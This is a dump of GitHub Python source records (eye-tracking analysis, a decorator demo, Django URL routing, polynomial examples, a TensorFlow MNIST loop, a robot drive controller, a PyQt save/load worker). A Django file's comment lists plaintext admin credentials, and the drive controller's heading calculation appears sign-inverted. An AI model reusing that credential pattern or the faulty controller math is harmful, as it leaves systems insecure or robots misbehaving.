xDeg in enumerate(leftXDeg[fixateTimeWRTEyePos:]):\n if -(windowWidth/2) > xDeg or xDeg > (windowWidth/2) or -(windowHeight/2) > leftYDeg[fixateTimeForIndex] or leftYDeg[fixateTimeForIndex] > (windowHeight/2):\n eyePosSac = index + fixateTimeWRTEyePos\n break\n else:\n fixateTimeForIndex += 1\n eyePosSacTimeMS = eyePosSac * 2\n saccadeTime = currTrial['saccade'].item()['timeMS'].item()\n diff = (saccadeTime - trialStart) - eyePosSacTimeMS\n \n targetOn = currTrial['targetOn']['timeMS']\n eyePosReactTime = eyePosSacTimeMS - (targetOn - trialStart)\n eyePosDurTarget.append((trialNumber, eyePosReactTime))\n knotRTSaccTarget = saccadeTime - targetOn\n targetOnTimeEyePos = (targetOn - trialStart)/2\n\n plt.figure()\n plt.plot(leftXDeg, color = 'olive')\n plt.plot(leftYDeg, color = 'green')\n plt.plot(rightXDeg, color = 'blue')\n plt.plot(rightYDeg, color = 'red')\n plt.axvline(x = targetOnTimeEyePos)\n plt.title(eyePosReactTime)\n\n# scatter plot RTs aligned with targetOnset\nfor y,x in eyePosDurTarget:\n plt.scatter(x,y) \nplt.axvline(x=0)\n\n# scatter plot of trialOutcomes \nfor n,outcome in enumerate(trialOutcomes):\n if outcome == 0:\n color = 'green'\n elif outcome == 6:\n color = 'orange'\n else:\n color = 'blue'\n plt.scatter(n, outcome, c = color, s = 0.5)\nfor x_axis in catchTrials:\n plt.axvline(x = x_axis, color = 'pink')\nfor x_axis in invalidTrials:\n plt.axvline(x = x_axis, color = 'black')\nplt.show()\n\n'''\nOR\n'''\nfor n,currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data'].item()\n if extendedEOT == 0:\n plt.scatter(n+1,extendedEOT, color = 'green')\n elif extendedEOT == 6:\n plt.scatter(n+1, extendedEOT, color = 'orange')\n else:\n plt.scatter(n+1, extendedEOT, color = 'blue')\nplt.show()\n\n# diff in the len of the stimOn and stimOff list\nstimDiff = []\nfor currTrial in allTrialsData.item()[0]:\n trial = currTrial['trial'].item()['data'].item()\n if trial['instructTrial'] != 1:\n if fieldInTrial(['stimulusOn', 'stimulusOff'], currTrial): \n stimulusOn = currTrial['stimulusOn'].item()['timeMS'].item()\n stimulusOff = currTrial['stimulusOff'].item()['timeMS'].item()\n if type(stimulusOn) == int:\n stimDiff.append(0)\n elif type(stimulusOff) == int:\n stimDiff.append(len(stimulusOn) - 1)\n else:\n stimDiff.append(len(stimulusOn) - len(stimulusOff))\n\ndist = {}\nfor i in stimDiff:\n dist[i] = dist.get(i,0)+1\n\n#hist\nplt.hist(np.array(distRT).flatten(), bins = 20)\n\n#weird Trials\nweirdTrials = []\nfor n, currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n if extendedEOT == 6 and fieldInTrial(['reactTimeMS'], currTrial):\n weirdTrials.append(n)\n\n#stim diff for trials preceding the weird trials\nstimDiff = []\nfor i in weirdTrials:\n currTrial = allTrialsData.item()[0][i-1]\n trial = currTrial['trial'].item()['data'].item()\n if trial['instructTrial'] != 1:\n if fieldInTrial(['stimulusOn', 'stimulusOff'], currTrial): \n stimulusOn = currTrial['stimulusOn'].item()['timeMS'].item()\n stimulusOff = currTrial['stimulusOff'].item()['timeMS'].item()\n if type(stimulusOn) == int:\n stimDiff.append(0)\n elif type(stimulusOff) == int:\n stimDiff.append(len(stimulusOn) - 1)\n else:\n stimDiff.append(len(stimulusOn) - len(stimulusOff))\n\n\n'''\nMTNAN\n'''\n\n#code will generate a list of interstim frame diff for task gabor\nstimDescInterstim = []\nfor count, currTrial in enumerate(allTrialsData.item()[0]):\n print(count)\n trial = currTrial['trial'].item()['data'].item()\n stimDesc = currTrial['stimDesc'].item()['data'].item()\n taskStimCount = 0\n for stim in stimDesc:\n if stim['stimLoc'] == 2:\n if taskStimCount == 0:\n frameOff = stim['stimOffFrame']\n taskStimCount += 1\n else:\n frameDiff = stim['stimOnFrame'] - frameOff\n frameOff = stim['stimOffFrame']\n stimDescInterstim.append(frameDiff)\n\n\n\ntargetOnTimes = []\n\nfor currTrial in allTrialsData.item()[0]:\n trial = currTrial['trial'].item()['data'].item()\n if trial['instructTrial'] != 1 and trial['catchTrial'] != 1:\n targetOnTimes.append(trial['targetOnTimeMS'].tolist())\n \n\n\n\n\n# for count, i in enumerate(stimDesc['listType']):\n# if i == 2:\n# stimSeqLen = count\n# break\n# targetOnFrame = stimDesc['stimOnFrame'][stimSeqLen]\n# targetOnTimeMs = targetOnFrame * (1000/75)\n# targetOnTimes.append(targetOnTimeMS)\n\n'''\nMTNC\n'''\n\n#testing\nstimIndexCount = np.zeros(49) \nfor trialCount, corrTrial in enumerate(corrTrials):\n currTrial = allTrials[corrTrial]\n stimDesc = currTrial['stimDesc']['data']\n for stim in stimDesc:\n if stim['stimLoc'] == 0 and stim['listType'] == 1:\n stimIndex = np.int32(stim['stimIndex'])\n stCount = int(stimIndexCount[stimIndex])\n stimIndexCount[stimIndex] += 1\n\n\n'''\nMTNC\n'''\n\nfor shortTrial in shortRT:\n currTrial = allTrials[shortTrial]\n eyeXYPos = eyePosDurTrial(currTrial)\n eyeXYPos = eyePosDurTrial(currTrial)\n fixate = currTrial['fixate']['timeMS']\n trialStart = currTrial['trialStart']['timeMS']\n fixateTimeWRTEyePos = math.floor((fixate - trialStart)/2)\n windowWidth = currTrial['fixWindowData']['data']['windowDeg']['size']['width']\n windowHeight = currTrial['fixWindowData']['data']['windowDeg']['size']['height']\n\n for index, xDeg in enumerate(eyeXYPos['leftX'][fixateTimeWRTEyePos:]):\n if -(windowWidth/2) > xDeg or xDeg > (windowWidth/2):\n eyePosSac = index + fixateTimeWRTEyePos\n break\n eyePosSacTimeMS = eyePosSac * 2\n saccadeTime = currTrial['saccade']['timeMS']\n diff = (saccadeTime - trialStart) - eyePosSacTimeMS","repo_name":"MaunsellLab/MTCAN","sub_path":"Python Code/codeChecks.py","file_name":"codeChecks.py","file_ext":"py","file_size_in_byte":11084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3658376991","text":"#!/usr/bin/env python\n\n\nclass debugger(): # <1>\n\n function_calls = []\n\n def __init__(self, func): # <2>\n self._func = func\n\n def __call__(self, *args, **kwargs): # <3>\n\n # print(\"*\" * 40) # <4>\n # print(\"function {}()\".format(self._func.__name__)) # <4>\n # print(\"\\targs are \", args) # <4>\n # print(\"\\tkwargs are \", kwargs) # <4>\n #\n # print(\"*\" * 40) # <4>\n\n self.function_calls.append( # <5>\n (self._func.__name__, args, kwargs)\n )\n\n result = self._func(*args, **kwargs) # <6>\n return result # <7>\n\n @classmethod\n def get_calls(cls): # <8>\n return cls.function_calls\n\n@debugger # <9>\ndef hello(greeting, whom=\"world\"):\n print(\"{}, {}\".format(greeting, whom))\n\n@debugger # <9>\ndef bark(bark_word, *, repeat=2):\n print(\"{0}! \".format(bark_word) * repeat)\n\nhello('hello', 'world') # <10>\nprint()\n\nhello('hi', 'Earth')\nprint()\n\nhello('greetings')\n\nbark(\"woof\", repeat=3)\nbark(\"yip\", repeat=4)\nbark(\"arf\")\n\nhello('hey', 'girl')\n\nprint('-' * 60)\n\nfor i, info in enumerate(debugger.get_calls(), 1): # <11>\n print(\"{:2d}. {:10s} {!s:20s} {!s:20s}\".format(i, info[0], info[1], info[2]))\n","repo_name":"sa-i/20200414py3interm","sub_path":"EXAMPLES/deco_debug_class.py","file_name":"deco_debug_class.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3754969508","text":"\"\"\"Supp_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n# admin: (user:admin, password:admin123)\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.static import serve\n\nfrom Supp_project.settings import MEDIA_ROOT\nfrom user import views\n\nurlpatterns = [\n path('', views.login),\n path('index', views.index),\n path('welcome', views.welcome),\n path('winning_bid_info', views.winning_bid_info),\n path('winning_detail', views.winning_detail),\n path('admin_info', views.admin_info),\n path('demo_add', views.demo_add),\n path('demo_edit', views.demo_edit),\n path('entrust_add', views.entrust_add),\n path('entrust_edit', views.entrust_edit),\n path('menu1', views.menu1),\n path('menu2', views.menu2),\n path('menu_add', views.menu_add),\n path('menu_see', views.menu_see),\n path('menu_edit', views.menu_edit),\n path('supplier_management', views.supplier_management),\n path('qualification_management', views.qualification_management),\n path('qua_mana_edit', views.qua_mana_edit),\n path('winning_detail_child', views.winning_detail_child),\n path('winning_detail_child_add', views.winning_detail_child_add),\n path('winning_detail_child_edit', views.winning_detail_child_edit),\n path('winning_bid_consum_deta', views.winning_bid_consum_deta),\n\n # path('upload', views.upload_img),\n\n # 接口\n path('sign_in/', views.sign_in, name='sign_in/'),\n path('zb_info/', views.zb_info, name='zb_info/'),\n path('test_api/', views.test_api, name='test_api/'),\n path('jbxx_info/', views.jbxx_info, name='jbxx_info/'),\n path('wtxx_info/', views.wtxx_info, name='wtxx_info/'),\n path('jbxx_edit/', views.jbxx_edit, name='jbxx_edit/'),\n path('jbxx_add/', views.jbxx_add, name='jbxx_add/'),\n path('wtxx_edit/', views.wtxx_edit, name='wtxx_edit/'),\n path('wtxx_add/', views.wtxx_add, name='wtxx_add/'),\n path('cglb_info/', views.cglb_info, name='cglb_info/'),\n path('cgmx_info/', views.cgmx_info, name='cgmx_info/'),\n path('shxx_info/', views.shxx_info, name='shxx_info/'),\n # path('menu_see_info/', views.menu_see_info, name='menu_see_info/'),\n path('get_menu_see/', views.get_menu_see, name='get_menu_see/'),\n path('menu_edit_info/', views.menu_edit_info, name='menu_edit_info/'),\n path('menu_add_info/', views.menu_add_info, name='menu_add_info/'),\n path('jbxx_del/', views.jbxx_del, name='jbxx_del/'),\n path('wtxx_del/', views.wtxx_del, name='wtxx_del/'),\n path('shxx_del/', views.shxx_del, name='shxx_del/'),\n path('upload_img/', views.upload_img, name='upload_img/'),\n path('jbxx_see/', views.jbxx_see, name='jbxx_see/'),\n path('jbxx_add/', views.jbxx_add, name='jbxx_add/'),\n path('winning_bid_consumables/', views.winning_bid_consumables, name='winning_bid_consumables/'),\n path('winning_bid_consumables_detailed/', views.winning_bid_consumables_detailed, name='winning_bid_consumables_detailed/'),\n]\n","repo_name":"yang94913/Supp_project","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"133750775","text":"\n\ndef basic_example_1d():\n from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial\n p = Polynomial([1, 2, 3])\n print(p)\n print(p(1))\n print(2 * p)\n\n\ndef basic_example_2d():\n from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial\n p = Polynomial([1, 2, 3], r=1, m=2)\n print(p)\n print(p((1, 2)))\n print(p**2)\n\n\ndef basic_example_1d2d():\n from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial\n p = Polynomial([[1, 0], [2, 1], [3, 2]])\n print(p)\n print(p(1))\n\n\ndef lagrange_example_1d():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_function\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import lagrange_basis\n fig = plt.figure()\n for l in lagrange_basis(2, 1):\n plot_function(l, 0.0, 1.0, fig=fig)\n plt.show()\n\n\ndef lagrange_example_2d():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_bivariate_function\n from polynomials_on_simplices.geometry.primitives.simplex import unit\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import lagrange_basis_fn\n vertices = unit(2)\n l = lagrange_basis_fn((0, 1), 2)\n plot_bivariate_function(lambda x1, x2: l((x1, x2)), vertices)\n plt.show()\n\n\ndef lagrange_example_1d_arbitrary():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_function\n from polynomials_on_simplices.polynomial.polynomials_simplex_lagrange_basis import lagrange_basis_simplex\n fig = plt.figure()\n for l in lagrange_basis_simplex(2, [[1], [3]]):\n plot_function(l, 1.0, 3.0, fig=fig)\n plt.show()\n\n\ndef lagrange_example_2d_arbitrary():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_bivariate_function\n from polynomials_on_simplices.polynomial.polynomials_simplex_lagrange_basis import lagrange_basis_fn_simplex\n vertices = [\n [1.0, 0.0],\n [1.0, 1.0],\n [0.0, 1.0]\n ]\n l = lagrange_basis_fn_simplex((0, 1), 2, vertices)\n plot_bivariate_function(lambda x1, x2: l((x1, x2)), vertices)\n plt.show()\n\n\ndef lagrange_example_4d():\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import PolynomialLagrange\n p = PolynomialLagrange([1, 2, 3, 4, 5], r=1, m=4)\n print(p)\n print(p((0.1, 0.2, 0.3, 0.4)))\n\n\ndef lagrange_example_1d_dual_basis():\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import dual_lagrange_basis_fn, \\\n lagrange_basis_fn\n l0 = lagrange_basis_fn(0, 2)\n l1 = lagrange_basis_fn(1, 2)\n q0 = dual_lagrange_basis_fn(0, 2)\n q1 = dual_lagrange_basis_fn(1, 2)\n print(q0(l0))\n print(q0(l1))\n print(q1(l0))\n print(q1(l1))\n\n\ndef differentiation_example():\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_bernstein_basis import PolynomialBernstein\n b = PolynomialBernstein([1, 0, 0, 1, 0, 0], r=2, m=2)\n print(b)\n print(b.latex_str_expanded())\n print(b.partial_derivative(0).latex_str_expanded())\n print(b.partial_derivative(1).latex_str_expanded())\n from polynomials_on_simplices.calculus.polynomial.polynomials_calculus import derivative\n print(derivative(b, (1, 1)))\n\n\ndef integration_example():\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_bernstein_basis import bernstein_basis_fn\n from polynomials_on_simplices.calculus.polynomial.polynomials_calculus import integrate_unit_simplex\n b = bernstein_basis_fn((1, 0), 1)\n print(b.latex_str_expanded())\n print(integrate_unit_simplex(b))\n\n\ndef piecewise_polynomial_example_1d():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.piecewise_polynomial.plot_piecewise_polynomial import \\\n plot_univariate_piecewise_polynomial\n from polynomials_on_simplices.piecewise_polynomial.piecewise_polynomial_bernstein_basis import \\\n piecewise_polynomial_bernstein_basis\n lines = [[0, 1], [1, 2]]\n vertices = [[1.0], [2.0], [3.0]]\n fig = plt.figure()\n for b in piecewise_polynomial_bernstein_basis(lines, vertices, r=2):\n plot_univariate_piecewise_polynomial(b, fig=fig)\n plt.show()\n\n\ndef piecewise_polynomial_example_2d():\n from polynomials_on_simplices.piecewise_polynomial.plot_piecewise_polynomial import \\\n plot_bivariate_piecewise_polynomial\n from polynomials_on_simplices.piecewise_polynomial.continuous_piecewise_polynomial_bernstein_basis import \\\n continuous_piecewise_polynomial_bernstein_basis\n\n triangles = [\n [0, 1, 2],\n [1, 3, 2]\n ]\n vertices = [\n [0.0, 0.0],\n [1.0, 0.0],\n [0.0, 1.0],\n [1.0, 1.0]\n ]\n for b in continuous_piecewise_polynomial_bernstein_basis(triangles, vertices, r=1):\n plot_bivariate_piecewise_polynomial(b, edge_resolution=2)\n\n\nif __name__ == \"__main__\":\n basic_example_1d()\n basic_example_2d()\n basic_example_1d2d()\n\n lagrange_example_1d()\n lagrange_example_2d()\n lagrange_example_1d_arbitrary()\n lagrange_example_2d_arbitrary()\n lagrange_example_4d()\n lagrange_example_1d_dual_basis()\n\n differentiation_example()\n integration_example()\n\n piecewise_polynomial_example_1d()\n piecewise_polynomial_example_2d()\n","repo_name":"FAndersson/polynomials_on_simplices","sub_path":"docs/readme_examples.py","file_name":"readme_examples.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19209853588","text":"# 基于前面的前向传播代码进行更改\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import datasets\n\n# x: [60k,28,28],[10k,28,28]\n# y: [60k],[10k]\n(x, y), (x_test, y_test) = datasets.mnist.load_data()\n\n# 将数据集转化为一个tensor变量\nx = tf.convert_to_tensor(x, dtype=tf.float32)\ny = tf.convert_to_tensor(y, dtype=tf.int32)\n\nx_test = tf.convert_to_tensor(x_test, dtype=tf.float32)\ny_test = tf.convert_to_tensor(y_test, dtype=tf.int32)\n\nprint(x.shape, y.shape, x.dtype, y.dtype)\nprint(tf.reduce_min(x), tf.reduce_max(x))\nprint(tf.reduce_min(y), tf.reduce_max(y))\n\n# 一个batch取128个数值\ntrain_db = tf.data.Dataset.from_tensor_slices((x, y)).batch(128)\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(128)\ntrain_iter = iter(train_db) # 迭代器\nsample = next(train_iter)\nprint('batch', sample[0].shape, sample[1].shape)\n\n# 创建一个模拟的神经网络,加上权值\n# 神经网络结构:[b,784]->[b,256]->[b,128]->[b,10]\n# 输入参数为[dim_in,dim_out],输出为[dim_out]\nw1 = tf.Variable(tf.random.truncated_normal([784, 256], stddev=0.01)) # 解决梯度爆炸问题\nb1 = tf.Variable(tf.zeros([256]))\nw2 = tf.Variable(tf.random.truncated_normal([256, 128], stddev=0.01))\nb2 = tf.Variable(tf.zeros([128]))\nw3 = tf.Variable(tf.random.truncated_normal([128, 10], stddev=0.01))\nb3 = tf.Variable(tf.zeros([10]))\nlr = 1e-3 # 学习率\n\nfor epoch in range(50): # 对数据集进行多次迭代\n for step, (x, y) in enumerate(train_db): # 每个batch进行迭代\n # x:[128,28,28]\n # y:[128]\n\n # 需要去做一个维度变换,才能够将数据载入到我们的前向传播中\n # [b,28,28]->[b,28*28]\n x = tf.reshape(x, [-1, 28 * 28])\n\n # 包装在一个求导的环境下,方便计算\n # 出现与权值相关的代码一定要放进去\n with tf.GradientTape() as tape: # 只会跟踪tf.Variable类型的数据,如果将权值定义成常量,会报错\n # x:[b,28*28]\n # h1=x@w1+b1\n # [b,784]@[784,256]+[256]->[b,256]+[256]->[b,256]+[b,256]\n h1 = x @ w1 + tf.broadcast_to(b1, [x.shape[0], 256])\n h1 = tf.nn.relu(h1) # 非线性层激活函数\n # [b,256]->[b,128]\n h2 = h1 @ w2 + b2\n h2 = tf.nn.relu(h2)\n # 输出层\n out = h2 @ w3 + b3\n\n # compute loss\n # out:[b,10]\n # y:[b]-> [b,10]\n y_onehot = tf.one_hot(y, depth=10)\n\n # mse=mean(sum(y-out)^2)\n # [b,10]\n loss = tf.square(y_onehot - out)\n # mean:scalar\n loss = tf.reduce_mean(loss)\n\n # 利用上面包装好的部分计算梯度\n grads = tape.gradient(loss, [w1, b1, w2, b2, w3, b3])\n # w1=w1-lr*w1_grad\n # 对参数进行原地更新,效果与前面的类似\n w1.assign_sub(lr * grads[0]) # 对应上面的参数位置\n b1.assign_sub(lr * grads[1])\n w2.assign_sub(lr * grads[2])\n b2.assign_sub(lr * grads[3])\n w3.assign_sub(lr * grads[4])\n b3.assign_sub(lr * grads[5])\n\n if step % 100 == 0:\n print(epoch, step, 'loss:', float(loss))\n\n # test/evluation,对结果进行一个测试\n # 使用之前的w1,w2,w3,b1,b2,b3\n total_correct, total_num = 0, 0\n for step, (x, y) in enumerate(test_db):\n # [b,28,28]=>[b,28*28]\n x = tf.reshape(x, [-1, 28 * 28])\n\n # [b,784]=>[b,256]=>[b,128]=>[b,10]\n h1 = tf.nn.relu(x @ w1 + b1)\n h2 = tf.nn.relu(h1 @ w2 + b2)\n out = h2 @ w3 + b3\n\n # out:[b,10] -R\n # prob:[b,10]-[0,1]\n # 使用softmax对输出进行映射\n prob = tf.nn.softmax(out, axis=1)\n # 选取最大值所在的索引,[b,10]=>[b],默认返回int64\n pred = tf.cast(tf.argmax(prob, axis=1), dtype=tf.int32)\n # y:[b],进行比较\n correct = tf.cast(tf.equal(pred, y), dtype=tf.int32)\n correct = tf.reduce_sum(correct)\n # 计算总的正确个数\n total_correct += int(correct)\n total_num += x.shape[0]\n\n acc = total_correct / total_num\n print('test acc: ', acc)\n","repo_name":"LegendZh/tensorflow-learning","sub_path":"测试(张量)实战/forward.py","file_name":"forward.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17437662672","text":"import time\nimport math\nimport numpy as np\nfrom pprint import pprint, pformat\n\ndef clamp(minimum, x, maximum):\n # Clamp the value of x to be between minimum and maximum\n return max(minimum, min(x, maximum))\n\ndef shortest_angular_difference(firstAngle, secondAngle):\n difference = secondAngle - firstAngle\n while (difference < -180):\n difference += 360\n while (difference > 180):\n difference -= 360\n return difference\n\nclass RobotDiffDriveController:\n '''\n A simple P-controller for differential drive robots\n '''\n\n x_current_pose = None\n y_current_pose = None\n current_heading = None # Degrees\n\n def __init__(self, **kwargs):\n\n # P-controller settings\n self.kP_lin = kwargs.get('kP_lin', 0.05)\n self.kP_ang = kwargs.get('kP_ang', 0.05)\n\n # Velocity Constraints\n self.max_lin_vel = kwargs.get('max_lin_vel', 0.6)\n self.max_ang_vel = kwargs.get('max_ang_vel', 0.0)\n \n self.max_driver_power = kwargs.get('max_driver_power', 1.0)\n self.min_driver_power = kwargs.get('min_driver_power', 0.2)\n\n # Stop moving if we are in a radius of reached_target_threshold metres from the target\n self.reached_target_threshold = kwargs.get('reached_target_threshold', 1.0)\n\n self.verbose = kwargs.get('verbose', False)\n\n print('Starting the differential drive controller with the following settings: ')\n pprint(kwargs)\n time.sleep(3.0)\n\n def position_update(self, x, y):\n self.x_current_pose = x\n self.y_current_pose = y\n\n if self.verbose:\n print('Robot is at position: ({:.2f}, {:.2f})'.format(x, y))\n\n def heading_update(self, heading_degrees):\n self.current_heading = heading_degrees\n\n if self.verbose:\n print('Robot has heading: ({:.2f})'.format(heading_degrees))\n\n def get_wheel_velocities(self, x_desired, y_desired):\n for varname in ['x_current_pose', 'y_current_pose', 'current_heading']:\n if not(varname in vars(self)):\n raise Exception('{} has not been set. Robot cannot drive without this'.format(varname))\n\n delta_x = self.x_current_pose - x_desired\n delta_y = self.y_current_pose - y_desired\n\n # Pythagoras to find distance to target\n dist_to_target = math.sqrt(math.pow(delta_x,2) + math.pow(delta_y,2))\n\n # Trigonometry\n heading_to_target_deg = math.atan2(delta_y, delta_x) * (180.0 / math.pi)\n \n # Compute Shortest Angular Difference in degrees\n delta_heading = shortest_angular_difference(self.current_heading, heading_to_target_deg)\n\n if self.verbose:\n print('Robot target position set to: ({:.2f}, {:.2f}). Robot has to travel {:.2f} metres at a heading of {:.2f} degrees, turning {:.2f} degrees'.format(\n x_desired, y_desired, dist_to_target, heading_to_target_deg, delta_heading))\n \n # Convert heading difference back to radians\n desired_heading_rad = delta_heading * (math.pi / 180.0)\n\n linear_velocity = self.kP_lin * dist_to_target\n angular_velocity = self.kP_ang * delta_heading\n\n if self.verbose:\n print('LIN_VEL: {:.2f}, ANG_VEL: {:.2f}'.format(linear_velocity, angular_velocity))\n\n # Limit The Velocities\n linear_velocity = clamp(0, linear_velocity, self.max_lin_vel)\n angular_velocity = clamp(-self.max_ang_vel, angular_velocity, self.max_ang_vel)\n\n # Calculate the motor speeds\n left_speed, right_speed = 0.0, 0.0\n if dist_to_target > self.reached_target_threshold:\n\n # vel_arr consists of [Left Speed Un-normalised, Right Speed Un-normalised]\n vel_arr = np.asarray([linear_velocity - angular_velocity, linear_velocity + angular_velocity])\n left_speed, right_speed = vel_arr\n\n # # Normalise: compute the velocity direction unit-vector\n # vel_dir_vec = vel_arr / np.linalg.norm(vel_arr)\n # print(vel_dir_vec)\n\n # Multiply the unit-vector by the robot max velocity to get the actual motor speeds\n # left_speed, right_speed = vel_dir_vec * self.max_driver_power\n\n if self.verbose:\n print('Unconstrained speeds: ({:.2f}, {:.2f})'.format(left_speed, right_speed))\n else:\n left_speed, right_speed = 0.0, 0.0\n if self.verbose:\n print('REACHED TARGET!')\n\n # Limit the motor speeds to the maximum the robot should go\n # Prevent it from moving any wheel backwards\n # left_speed = clamp(-self.max_driver_power, left_speed, self.max_driver_power)\n # right_speed = clamp(-self.max_driver_power, right_speed, self.max_driver_power)\n\n # Prevent it from moving any wheel backwards\n left_speed = clamp(0.0, left_speed, self.max_driver_power)\n right_speed = clamp(0.0, right_speed, self.max_driver_power)\n\n # Cut power if below threshold\n # This avoids motor windings burning out\n if abs(left_speed) < self.min_driver_power:\n left_speed = 0.0\n\n if abs(right_speed) < self.min_driver_power:\n right_speed = 0.0\n\n return (left_speed, right_speed)\n","repo_name":"clungzta/roboRoller","sub_path":"diff_drive.py","file_name":"diff_drive.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16512246181","text":"import gzip\nimport os\n\nimport numpy as np\nfrom PIL import Image\nfrom PyQt5.QtCore import *\n\nclass SaveLoad(QObject):\n\n finished = pyqtSignal()\n create_set = pyqtSignal(str, object)\n add_to_training_set = pyqtSignal(str, object)\n add_to_testing_set = pyqtSignal(object)\n one_iteration = pyqtSignal(int, str)\n set_iteration_stats = pyqtSignal(list)\n set_classified_info = pyqtSignal(str, int, int)\n\n def __init__(self, filename=None, sets=None, testing_images=None, folder_name=None, iteration_stats=None):\n super().__init__()\n self.filename = filename\n self.sets = sets\n self.testing_images = testing_images\n self.folder_name = folder_name\n self.iteration_stats = iteration_stats\n\n def export_sets(self):\n total_image_count = 0\n images_done = 0\n\n for set in self.sets:\n total_image_count += len(set.all_images)\n\n for set in self.sets:\n set_dir = os.path.join(self.folder_name, set.name)\n if not os.path.exists(set_dir):\n os.makedirs(set_dir)\n images = set.all_images\n for i, image in enumerate(images):\n images_done += 1\n new_img = Image.fromarray(image.imageData.reshape(44, -1))\n img_title = image.title\n if not image.title:\n img_title = set.name + \"-\" + str(i) + \".tif\"\n new_img.save(os.path.join(set_dir, img_title))\n self.finished_one_iteration((images_done + 1) / total_image_count, \"Exporting set \" + set.name)\n\n self.finished.emit()\n\n def load_images(self):\n inF = gzip.open(self.filename, 'rb')\n s = inF.read()\n inF.close()\n lines = s.decode(\"utf-8\").splitlines()\n setName = None\n reading_status = 0\n num_lines = len(lines)\n for i, line in enumerate(lines):\n\n if \"Iteration stats:\" in line:\n reading_status = 2\n elif \"Set:\" in line:\n setName = line.replace(\"Set: \", \"\", 1)\n reading_status = 1\n self.create_set.emit(setName, [])\n elif \"Icl:\" in line:\n others = line.replace(\"Icl: \", \"\", 1).split(\",\")\n self.set_classified_info.emit(setName, int(others[0]), int(others[1]))\n elif \"Testing set\" in line:\n reading_status = 0\n else:\n # Line is an image\n pixels = line.split(\",\")\n image = []\n image_plain = []\n for pixel in pixels:\n image_plain.append(pixel)\n image.append(np.uint8(pixel))\n\n if len(image) == 0: continue\n if reading_status == 1:\n self.add_to_training_set.emit(setName, [np.array(image)])\n elif reading_status == 0:\n self.add_to_testing_set.emit(np.array(image))\n elif reading_status == 2:\n # Reading iteration stats\n self.set_iteration_stats.emit(image_plain)\n\n self.finished_one_iteration((i + 1) / num_lines, \"Loading images\")\n\n self.finished.emit()\n\n def save_images(self):\n\n f = gzip.open(self.filename, \"wb\")\n\n # Copy testing set to save\n testing_set = self.testing_images\n testing_set_len = len(testing_set)\n total_len = testing_set_len\n current_item = 0\n\n for set in self.sets:\n total_len += len(set.all_images)\n\n if self.iteration_stats and len(self.iteration_stats) > 0:\n f.write(bytes(\"Iteration stats:\\n\", encoding=\"utf-8\"))\n for i, num in enumerate(self.iteration_stats):\n extra = '' if i == (len(self.iteration_stats) - 1) else ','\n f.write(bytes(str(num) + extra, encoding=\"utf-8\"))\n f.write(bytes('\\n', encoding=\"utf-8\"))\n\n if testing_set_len > 0:\n f.write(bytes('Testing set\\n', encoding=\"utf-8\"))\n for image in testing_set:\n for i, pixel in enumerate(image):\n extra = '' if i == (len(image) - 1) else ','\n f.write(bytes(str(pixel) + extra, encoding=\"utf-8\"))\n f.write(bytes('\\n', encoding=\"utf-8\"))\n current_item += 1\n self.finished_one_iteration(current_item / total_len, \"Saving images\")\n\n for set in self.sets:\n images = set.all_images\n f.write(bytes('Set: ' + set.name + '\\n', encoding=\"utf-8\"))\n f.write(bytes(\"Icl: \" + str(set.incorrectly_classified_local) + ',' + str(set.incorrectly_classified) +' \\n', encoding=\"utf-8\"))\n for image in images:\n for i, pixel in enumerate(image.imageData):\n extra = '' if i == (len(image.imageData) - 1) else ','\n f.write(bytes(str(pixel) + extra, encoding=\"utf-8\"))\n f.write(bytes('\\n', encoding=\"utf-8\"))\n current_item += 1\n self.finished_one_iteration(current_item / total_len, \"Saving images\")\n\n f.close()\n\n def finished_one_iteration(self, amount, label):\n self.one_iteration.emit(int(amount * 100), label)","repo_name":"ThusStyles/finalyearproject","sub_path":"Framework/GUI/ThreadOps/SaveLoad.py","file_name":"SaveLoad.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 